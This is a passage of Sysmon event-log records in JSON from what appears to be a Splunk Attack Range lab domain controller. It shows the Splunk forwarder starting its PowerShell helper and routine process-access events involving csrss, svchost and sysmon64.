MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.320","ProcessGuid":"{41C8662E-203B-5F25-0000-0010E90E0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010E90E0600}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010E90E0600}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010E90E0600}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010E90E0600}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 